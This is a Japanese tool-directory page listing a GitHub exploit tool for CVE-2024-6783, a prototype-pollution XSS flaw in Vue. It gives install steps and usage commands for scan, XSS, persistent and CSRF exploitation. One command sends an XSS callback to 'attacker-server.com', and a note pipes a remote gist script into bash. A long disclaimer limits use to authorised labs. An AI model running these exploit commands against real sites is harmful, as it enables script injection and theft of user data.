Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-6783 — CVE-2024-6783 - Vue CVE | Kitploit
ツール/GitHubGitHub/horkimhab/cve-2024-6783
脆弱性分析CTF学習と教育厳選リソース学習パスとコースラボと実践
GitHubhorkimhab/cve-2024-6783

CVE-2024-6783

CVE-2024-6783 - Vue CVE

リポジトリを見る
31ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
ウェブサイト
共有

CVE-2024-6783 - Vue CVE

Vueに脆弱性が発見されました。これにより、攻撃者はプロトタイプ汚染を介してXSSを実行できます。攻撃者は、Object.prototype.staticClass や Object.prototype.staticStyle などの一部のプロパティのプロトタイプチェーンを変更し、任意のJavaScriptコードを実行する可能性があります。

寄付

このプロジェクトの維持をPayPalまたは下のQRコードをスキャンしてサポートしてください。

paypal

QR code for donation

⚡ 簡単な使用法

このプロジェクトは、以下のような安全で許可された環境でのみ使用してください:

  • ローカル仮想マシン
  • Dockerコンテナ
  • 隔離されたラボ環境
  • 許可されたペネトレーションテスト環境

設定例:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2024-6783
cd CVE-2024-6783

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

使用例:

root@kitploit:~
# scan only 
python cve-2024-6783.py -u https://example.com -v

# Scan & XSS Exploit 
python cve-2024-6783.py -u https://example.com -e xss

# XSS Exploit with Callback
python cve-2024-6783.py -u https://example.com -e xss -c http://attacker-server.com/callback

# Automatic Callback Server
python cve-2024-6783.py -u https://example.com -e persistent -c auto

# CSRF Exploitation
python cve-2024-6783.py -u https://example.com -e csrf

# Full Scan and Exploit with Verbose Output
python cve-2024-6783.py -u https://example.com -e xss -c auto -v -o evidence.html

注意:

  • 他のプロジェクトからクローンした場合は、curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y を実行してネストされた .git ディレクトリをクリアする必要があります。
  • 例:cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

謝辞または参考資料

  • https://www.herodevs.com/vulnerability-directory/cve-2024-6783?nes-for-vue-2
  • vue-template-compiler-patched-bio: https://github.com/bio/vue-template-compiler-patched

📚 教育用セキュリティ研究リポジトリ

制御された環境でサイバーセキュリティの概念を学習、テスト、研究するためのリポジトリです。


⚠️ セキュリティおよび法的免責事項

目的

このリポジトリは教育および許可されたセキュリティ研究のみを目的としています。

これはユーザーが以下について学ぶのを支援するために設計されています:

  • セキュリティ脆弱性
  • サンドボックスと分離の概念
  • 安全なコーディングと防御的実践

許可された使用のみ

このリポジトリは、以下のように許可がある環境でのみ使用してください:

  • 個人のラボまたは仮想マシン
  • Dockerまたは隔離環境
  • 許可されたペネトレーションテスト
  • サイバーセキュリティトレーニングまたは学術研究

不正または違法な使用は固く禁止されています。


責任の否認

著者および貢献者は、このプロジェクトによって生じたいかなる損害、誤用、法的問題、または損失についても責任を負いません。

このリポジトリを使用することにより、あなたは以下に同意するものとします:

  • あなた自身の行動に責任を持つこと
  • 合法的かつ倫理的に使用すること
  • プロジェクトは無保証で提供されること

倫理的使用

このプロジェクトは以下を目的としています:

  • 防御的セキュリティ研究
  • サイバーセキュリティ教育
  • 脆弱性認識
  • 安全なシステムおよびソフトウェア研究

責任ある開示の慣行に従い、適用されるすべての法律を遵守してください。


連絡先

責任ある開示やコラボレーションについては、GitHubを通じてリポジトリのメンテナーに連絡してください。

ツールをダウンロード